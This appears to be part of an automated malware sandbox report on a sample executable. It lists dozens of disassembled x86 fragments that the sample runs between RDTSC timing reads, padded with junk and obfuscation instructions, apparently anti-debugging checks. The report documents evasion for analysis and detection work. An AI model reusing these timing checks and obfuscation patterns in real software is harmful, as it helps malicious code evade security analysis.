Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C09EE4 second address: C09F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FC9D915F4B8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 xor si, CF00h 0x0000002c mov si, CED2h 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+12467325h], esi 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007FC9D915F4B8h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 00000014h 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 or di, 6527h 0x00000059 xchg eax, ebx 0x0000005a pushad 0x0000005b ja 00007FC9D915F4B8h 0x00000061 push eax 0x00000062 push edx 0x00000063 jno 00007FC9D915F4B6h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C09CAE second address: C09CB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0B59F second address: C0B5A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0B31A second address: C0B32A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D8BCC16Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0C088 second address: C0C0CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FC9D915F4B8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov edi, ebx 0x00000028 push 00000000h 0x0000002a stc 0x0000002b push eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0C0CD second address: C0C0D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0C0D1 second address: C0C0DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C12C88 second address: C12CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a jno 00007FC9D8BCC178h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C12CAE second address: C12CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC9D915F4B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C12CB8 second address: C12CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C12CBC second address: C12CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FC9D915F4C5h 0x0000000f jmp 00007FC9D915F4BDh 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C12CDA second address: C12CDF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BC7CFC second address: BC7D23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FC9D915F4BDh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1329C second address: C132A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FC9D8BCC166h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C132A6 second address: C132AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C132AA second address: C132C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007FC9D8BCC172h 0x0000000f jl 00007FC9D8BCC16Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1438F second address: C14421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FC9D915F4B8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push dword ptr fs:[00000000h] 0x0000002b mov edi, dword ptr [ebp+122D34A0h] 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007FC9D915F4B8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Ah 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 mov edi, ecx 0x00000054 mov eax, dword ptr [ebp+122D00C1h] 0x0000005a mov ebx, dword ptr [ebp+1248508Fh] 0x00000060 push FFFFFFFFh 0x00000062 mov bh, al 0x00000064 nop 0x00000065 push eax 0x00000066 push edx 0x00000067 push ecx 0x00000068 jmp 00007FC9D915F4C3h 0x0000006d pop ecx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C152F8 second address: C152FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C14421 second address: C14426 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C16121 second address: C16149 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC177h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jl 00007FC9D8BCC166h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C152FD second address: C15389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ebx 0x0000000e pop edi 0x0000000f nop 0x00000010 mov edi, dword ptr [ebp+122D301Ch] 0x00000016 push dword ptr fs:[00000000h] 0x0000001d xor edi, dword ptr [ebp+122D1974h] 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007FC9D915F4B8h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 call 00007FC9D915F4C0h 0x00000049 mov di, si 0x0000004c pop edi 0x0000004d mov eax, dword ptr [ebp+122D091Dh] 0x00000053 mov edi, dword ptr [ebp+122D2A69h] 0x00000059 mov bl, ah 0x0000005b push FFFFFFFFh 0x0000005d sub edi, dword ptr [ebp+122D3435h] 0x00000063 nop 0x00000064 push eax 0x00000065 push edx 0x00000066 jno 00007FC9D915F4C0h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C14426 second address: C1442C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C16149 second address: C1614F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C15389 second address: C153B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC9D8BCC178h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1614F second address: C16153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1442C second address: C14439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C153B5 second address: C153BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C14439 second address: C1443D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C16153 second address: C161A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FC9D915F4B8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 jbe 00007FC9D915F4BAh 0x00000029 mov di, 9838h 0x0000002d push 00000000h 0x0000002f and di, 3876h 0x00000034 push 00000000h 0x00000036 cmc 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FC9D915F4C4h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C153BB second address: C153BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C161A4 second address: C161AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C153BF second address: C153C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C16388 second address: C163A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FC9D915F4BCh 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C163A0 second address: C163A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C17DC6 second address: C17DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C17DCC second address: C17DE6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC9D8BCC16Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C18CC2 second address: C18D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FC9D915F4B8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov ebx, edx 0x00000025 push 00000000h 0x00000027 ja 00007FC9D915F4BCh 0x0000002d push 00000000h 0x0000002f jc 00007FC9D915F4BBh 0x00000035 or di, 5B76h 0x0000003a xchg eax, esi 0x0000003b jmp 00007FC9D915F4BCh 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push ecx 0x00000044 pushad 0x00000045 popad 0x00000046 pop ecx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C17F9B second address: C18053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC176h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC9D8BCC16Fh 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FC9D8BCC168h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a clc 0x0000002b push dword ptr fs:[00000000h] 0x00000032 sub bx, CB29h 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e mov bx, cx 0x00000041 mov ebx, dword ptr [ebp+122D2E1Ch] 0x00000047 mov eax, dword ptr [ebp+122D125Dh] 0x0000004d push 00000000h 0x0000004f push edx 0x00000050 call 00007FC9D8BCC168h 0x00000055 pop edx 0x00000056 mov dword ptr [esp+04h], edx 0x0000005a add dword ptr [esp+04h], 0000001Dh 0x00000062 inc edx 0x00000063 push edx 0x00000064 ret 0x00000065 pop edx 0x00000066 ret 0x00000067 mov dword ptr [ebp+122D2E51h], ecx 0x0000006d push FFFFFFFFh 0x0000006f mov bh, E1h 0x00000071 nop 0x00000072 jnc 00007FC9D8BCC170h 0x00000078 push eax 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007FC9D8BCC16Ah 0x00000080 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C18053 second address: C1805D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC9D915F4BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1BCA9 second address: C1BCC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC176h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1BCC8 second address: C1BCCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1CD03 second address: C1CD2C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC9D8BCC168h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FC9D8BCC176h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1CD2C second address: C1CD8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FC9D915F4BDh 0x0000000f push 00000000h 0x00000011 or dword ptr [ebp+122D30CAh], edx 0x00000017 mov edi, dword ptr [ebp+122D1926h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007FC9D915F4B8h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 push eax 0x0000003a mov edi, 29CA581Ch 0x0000003f pop edi 0x00000040 push eax 0x00000041 jbe 00007FC9D915F4C2h 0x00000047 jl 00007FC9D915F4BCh 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1FDEB second address: C1FE72 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FC9D8BCC16Bh 0x00000010 nop 0x00000011 movzx ebx, dx 0x00000014 push ecx 0x00000015 mov dword ptr [ebp+122D3777h], edi 0x0000001b pop ebx 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FC9D8BCC168h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 jmp 00007FC9D8BCC16Ch 0x0000003d sub ebx, 42E42D6Ah 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ebx 0x00000048 call 00007FC9D8BCC168h 0x0000004d pop ebx 0x0000004e mov dword ptr [esp+04h], ebx 0x00000052 add dword ptr [esp+04h], 00000014h 0x0000005a inc ebx 0x0000005b push ebx 0x0000005c ret 0x0000005d pop ebx 0x0000005e ret 0x0000005f mov dword ptr [ebp+122D322Dh], edx 0x00000065 sub bx, 2151h 0x0000006a push eax 0x0000006b push edx 0x0000006c push ebx 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1CEF8 second address: C1CEFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1CEFC second address: C1CFA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 jo 00007FC9D8BCC174h 0x0000000e pushad 0x0000000f mov eax, dword ptr [ebp+122D2B49h] 0x00000015 add dword ptr [ebp+122D2DF9h], ebx 0x0000001b popad 0x0000001c push dword ptr fs:[00000000h] 0x00000023 push 00000000h 0x00000025 push edx 0x00000026 call 00007FC9D8BCC168h 0x0000002b pop edx 0x0000002c mov dword ptr [esp+04h], edx 0x00000030 add dword ptr [esp+04h], 00000017h 0x00000038 inc edx 0x00000039 push edx 0x0000003a ret 0x0000003b pop edx 0x0000003c ret 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 push 00000000h 0x00000046 push edi 0x00000047 call 00007FC9D8BCC168h 0x0000004c pop edi 0x0000004d mov dword ptr [esp+04h], edi 0x00000051 add dword ptr [esp+04h], 0000001Ch 0x00000059 inc edi 0x0000005a push edi 0x0000005b ret 0x0000005c pop edi 0x0000005d ret 0x0000005e jmp 00007FC9D8BCC178h 0x00000063 mov eax, dword ptr [ebp+122D100Dh] 0x00000069 sub bh, FFFFFF9Eh 0x0000006c movsx ebx, si 0x0000006f push FFFFFFFFh 0x00000071 or di, 45ABh 0x00000076 push eax 0x00000077 pushad 0x00000078 jmp 00007FC9D8BCC16Ch 0x0000007d pushad 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1DF04 second address: C1DF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1DF08 second address: C1DF0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C20D1D second address: C20D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC9D915F4BCh 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 je 00007FC9D915F4C2h 0x00000018 jc 00007FC9D915F4BCh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C20D44 second address: C20D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 push 00000000h 0x00000007 mov dword ptr [ebp+122D3777h], ebx 0x0000000d push 00000000h 0x0000000f add dword ptr [ebp+12467C01h], edi 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1DFC9 second address: C1DFD7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C21D27 second address: C21D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1FFCC second address: C1FFFC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC9D915F4C7h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC9D915F4BBh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C21D2D second address: C21D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C200E6 second address: C200EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C21E88 second address: C21E92 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BC9812 second address: BC9818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BC9818 second address: BC9830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D8BCC174h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BC9830 second address: BC9834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD2075 second address: BD207B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C29ED0 second address: C29ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C29ED4 second address: C29EEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC172h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C2D944 second address: C2D948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C2D948 second address: C2D94C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C2D94C second address: C2D952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C2DAC1 second address: C2DAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C2DAC5 second address: C2DACF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC9D915F4B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
